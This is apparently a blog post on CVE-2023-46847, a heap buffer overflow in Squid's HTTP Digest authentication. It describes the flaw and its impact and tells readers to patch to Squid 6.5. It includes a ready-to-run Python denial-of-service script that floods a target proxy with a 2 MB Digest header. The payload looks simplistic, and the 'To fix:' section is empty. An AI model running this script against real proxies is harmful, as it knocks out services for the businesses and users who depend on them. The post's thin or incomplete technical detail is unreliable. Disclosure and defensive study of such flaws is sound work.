CVE-2023-46847 - Exploiting a Critical Buffer Overflow in Squid’s HTTP Digest Authentication

---

Introduction

In October 2023, a critical vulnerability was discovered in Squid, the popular open-source proxy server and web cache. This vulnerability—CVE-2023-46847—opens the door for remote attackers to cause a Denial of Service (DoS) or potentially other harmful side effects. When Squid is configured to use HTTP Digest Authentication, attackers can exploit a buffer overflow and write up to 2 MB of arbitrary data into system memory. This post unpacks how this flaw works, how to reproduce it, and what you can do to protect your systems.

What Is Squid and Why Is This Serious?

Squid acts as a middleman between clients and servers—saving bandwidth and speeding up connections. Many businesses and ISPs use it to protect and control web usage.

A vulnerability in such a central application puts a lot at risk. The bug in question lets anyone on the internet send special HTTP requests and seriously destabilize your Squid server—or perhaps do even worse.

Impact: Up to 2MB of attacker-controlled data written to the heap

Official advisory:
https://github.com/squid-cache/squid/security/advisories/GHSA-7grc-j368-6q5f
https://github.com/squid-cache/squid/commit/c4e8c8aaed6b595eb01ae441cddffd159e45c5a3

How Does the Exploit Work?

When Squid is set up to use HTTP Digest Authentication, it must parse special headers (Proxy-Authorization: Digest ...) from incoming HTTP requests.

The vulnerable code, found in the function handling HTTP Digest, does not properly limit the size of input written to a memory buffer. This means an attacker can send a crafted header and overflow the buffer—corrupting memory.

The Squid process tries to parse the header, but ends up overwriting up to 2MB of heap memory.

Even if the attack does not immediately lead to code execution, Denial of Service is guaranteed: once the heap is smashed, Squid crashes or becomes unstable.

Sample Exploit Code

Below is a simplified Python script that demonstrates the Denial of Service vector. This will crash vulnerable Squid proxies configured with HTTP Digest authentication:

import socket

def dos_squid(target_host, target_port=3128):
    # Craft a large Digest header
    digest_value = 'A' * (2 * 1024 * 1024)  # 2MB of data
    request = (
        "GET http://example.com/ HTTP/1.1\r\n"
        "Host: example.com\r\n"
        f"Proxy-Authorization: Digest {digest_value}\r\n"
        "Connection: close\r\n\r\n"
    )

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target_host, target_port))
    s.sendall(request.encode())
    s.close()
    print(f"Sent DoS payload to {target_host}:{target_port}")

if __name__ == "__main__":
    dos_squid("YOUR_SQUID_SERVER_IP_OR_HOST")

Warning:
This code is for educational and defensive purposes only. Do not use it against systems you don't own or have permission to test.

Check this section in your squid.conf

auth_param digest program /usr/lib/squid3/digest_pw_auth ...

If it’s there, and your version is affected, you’re vulnerable.

Responsible Disclosure and Patching

The maintainers have published a patch, upgrading to Squid 6.5 or later fully mitigates the issue.

- Official Patch Commit
- Squid Security Advisory

To fix:

Conclusion

CVE-2023-46847 is a wake-up call for anyone running internet-facing Squid proxies with HTTP Digest authentication enabled. Attackers can easily crash your proxy with a simple request, and more advanced exploits may emerge. Patch and harden your systems now to avoid downtime or intrusion.

Further Reading

- Official Security Advisory
- Patch Commit
- NVD Entry for CVE-2023-46847

Timeline

Published on: 11/03/2023 08:15:08 UTC
Last modified on: 11/20/2023 16:15:08 UTC